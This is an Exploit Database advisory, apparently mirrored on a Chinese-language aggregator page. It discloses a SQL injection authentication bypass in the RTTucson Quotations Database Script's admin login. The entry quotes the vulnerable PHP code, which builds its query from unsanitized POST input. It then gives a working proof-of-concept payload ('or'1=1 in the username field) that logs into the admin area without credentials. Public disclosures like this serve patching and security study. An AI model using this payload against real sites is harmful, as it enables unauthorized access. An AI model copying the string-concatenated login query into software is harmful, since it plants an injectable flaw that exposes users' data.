RTTucson Quotations Database Script – Authentication Bypass

Exploit Database
11 阅读

作者： cr4wl3r

日期： 2013-02-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/24533/

# RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r http://bastardlabs.info
# Script: http://www.rttucson.com/files.html

# Bugs found /quotations/admin/include/login.php
---------------------------
36 if ($_POST['submit']) {
37
38 $Username = $_POST['Username'];
39 $Password = md5($_POST['Password']);
40
41 $query = "SELECT * from UsersTBL WHERE Username='$Username' AND Password='$Password'";
42 $result = mysql_query($query) or die ( mysql_error() );
---------------------------

Proof of Concept

http://bastardlabs/[path]/admin/include/login.php
Username: 'or'1=1
Password: cr4wl3r

last Exploits
RTTucson Quotations Database Script – Authentication Bypass的更多信息

PHP Gift Registry 1.5.5 – SQL Injection：
phpMySite – Cross-Site Scripting / SQL Injection：
QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection：
Invision Power Board (IP.Board) 4.x – Persistent Cross-Site Scripting：
V-SOL GPON/EPON OLT Platform 2.03 – Unauthenticated Configuration Download：
sNews CMS – Multiple Cross-Site Scripting Vulnerabilities：
Vivvo CMS – Local File Inclusion：
Coppermine Photo Gallery 1.5.10 – ‘searchnew.php’ Cross-Site Scripting：